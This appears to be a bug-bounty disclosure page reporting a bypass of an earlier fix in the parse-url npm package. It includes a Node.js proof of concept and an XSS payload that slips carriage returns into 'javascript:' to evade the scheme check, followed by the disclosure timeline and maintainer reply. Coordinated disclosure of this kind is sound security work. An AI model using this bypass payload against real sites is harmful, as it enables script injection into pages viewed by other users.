Bypass of last fix in ionicabizau/parse-url
Valid
Reported on
Jun 7th 2022
Description
last fix can be bypass because in this line we should consider the case \r\r
or even \r
too.
Proof of Concept
const http = require("http");
const parseUrl = require("parse-url");
const url = parseUrl('jav\r\r\rascript://%0aalert(1)');
console.log(url)
const server = http.createServer((request, response) => {
response.writeHead(200);
if (url.scheme !== "javascript" && url.scheme !== null) {
response.end("<a href=\'" + url.href + "\'>Wowww!</a>" );
}
else{
response.end("Nooo!");
}
});
server.listen(80, "127.0.0.1",function(){
console.log("http://"+this.address().address+":"+this.address().port);
});
Impact
attackers with this vulnerability can easily place any malicious JS code on webpages
We are processing your report and will contact the
ionicabizau/parse-url
team within 24 hours.
2 months ago
amammad modified the report
2 months ago
amammad modified the report
2 months ago
amammad modified the report
2 months ago
We have contacted a member of the
ionicabizau/parse-url
team and are waiting to hear back
2 months ago
amammad modified the report
2 months ago
:))
I struggle with that why I sent a perfect fix on another report of mine because I think this report can be fixed and ignored if we use my solution to patch this vulnerability on another report!
Is it possible to only get the bounty and don't release a CVE for this report, please?
We have sent a
follow up to the
ionicabizau/parse-url
team.
We will try again in 7 days.
2 months ago
We have sent a
second
follow up to the
ionicabizau/parse-url
team.
We will try again in 10 days.
2 months ago
Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.)
has been awarded the fix bounty
to join this conversation